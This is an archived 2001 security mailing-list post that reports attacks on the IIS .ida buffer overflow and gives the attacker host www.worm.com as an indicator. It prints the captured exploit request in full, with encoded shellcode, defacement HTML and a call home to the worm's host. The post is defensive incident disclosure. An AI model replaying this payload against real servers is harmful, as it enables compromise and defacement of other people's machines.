Security Incidents mailing list archives
IIS .ida exploit involving worm.com / 181.com / 216.99.52.100
From: Richard Bejtlich <richard () taosecurity com>
Date: Sun, 15 Jul 2001 16:25:42 -0500
Friends in the security world,I have recently observed multiple exploit attempts related to the "Microsoft Index Server and Indexing Service ISAPI Extension Buffer Overflow Vulnerability" described here:
http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fvid%3D2880It looks like successful execution of an exploit in the wild may result in the compromised machine making a connection to www.worm.com to report its status (216.99.52.100, also aliased as 181.com and chinga.com; note chinga.com also has an address of 209.81.7.23). Below is the signature of the exploit. I edited sections marked XXcensoredXX to preserve my privacy:
GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xml HOST:www.worm.com Accept: */* Content-length: 3569 USVWp hdGd=o `hXw pXXXxuXX3f=MZXQ<X3fPEyXB<XTxXTTHXLL:KERN3LxEL32 X4TXB LHHHLLTH;HLX<GetPLX|rocAHHXTH$3f
LTQLLLLLLLXTH LLXp Gdpu8LLLhhu!hP;CKCK4*hQ4Rp;CKCKLhhhthhShhMlLhE[SScxMQPPu&jLPhQUBPl;CKCKPd}\PPPifPtEPH,RjLPQjj;CKCK;CKCKLLLLtghm;CKCKL4LLHhPPPh9PsP:LMTHuPLAHRjh@P;CKCKLLLL0}VL;u>L`hQ%;CKCKLLRHPh@Q;CKCKjhjjjhhcP;CKCK00tth;CKCK8R;CKCK>LLLLG:8P;CKCK>LLLL|th;CKCKjd;CKCKjjj;CKCKxf|f~P[j|QxR;CKCKLLLL}7h;CKCKjjQxR;CKCKh;CKCKDPPPiYPitPti3SkttPPtPuttjd;CKCKjjj;CKCKxf|f~Ptj|RxP;CKCKjjhQxR;CKCKLEHhdddLLdtjLPMQhRxP;CKCKjjhQxR;CKCKLEHddddLLdtjLPMQdRxP;CKCKLhdddLLdtjLPhQxR;CKCKEHpLjLREHxQxR;CKCKjhPxQ;CKCKLxR;CKCK0XUWSVPj<Vhpt$(XPt$PX^[_] {xV4xV4xV4xV4xV4XPhGD$BE3LoadLibraryAGetSystemTimeCreateThreadCreateFileASleepGetSystemDefaultLangIDVirtualProtectinfocomm.dllTcpSockSendWS2_32.dllsocketconnectsendrecvclosesocketw3svc.dllGET ? HTTP/1.0
Content-type: text/xml HOST:www.worm.com Accept: */* Content-length: 3569 c:\notwormLMTH<html><head><meta http-equiv="Content-Type" content="text/html; charset=english"><title>HELLO!</title></head><bady><hr size=5><font color="red"><p align="center">Welcome to http://www.worm.com !<br><br>Hacked By Chinese!</font></hr></bady></html> HTTP/1.0 200
Pragma: no-cache Cache-Control: no-cache Content-Type: text/html Content-Length: 90 <TITLE>Error</TITLE> <BODY> <H1>Error</H1> XXcensoredXX: Unknown WWW server.</BODY> -----Curious about www.worm.com, I connected to port 80 on the box and found this:
telnet www.worm.com 80 Trying 216.99.52.100... Connected to chinga.com (216.99.52.100). Escape character is '^]'. <HTML> <HEAD><META HTTP-EQUIV="REFRESH" CONTENT="0.01; URL=http://www.goto.com/d/home/p/nettcorp/lander/srchindex.jhtml">
<TITLE> Nett Corp </TITLE> </HEAD><blockquote><!-- dlogphp activated, unique hit site is 181.com. IP is XXcensored, but it was my IP addressXX. Broswer is -->
</blockquote> </BODY> </HTML> Connection closed by foreign host. -----You can see in the 'dlogphp activated' section that my IP address appears to have been logged. (I removed the actual IP address.)
I suggest that readers check their logs for connections to 216.99.52.100 (www.worm.com), as outbound connections MAY indicate a compromised host. I am not a Windows expert and cannot validate the exploit as recorded in my logs, but I believe you may find this warning useful.
Sincerely, Richard Bejtlich http://bejtlich.net ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service.For more information on this free incident handling, management and tracking system please see:
http://aris.securityfocus.com
Current thread:
- IIS .ida exploit involving worm.com / 181.com / 216.99.52.100 Richard Bejtlich (Jul 16)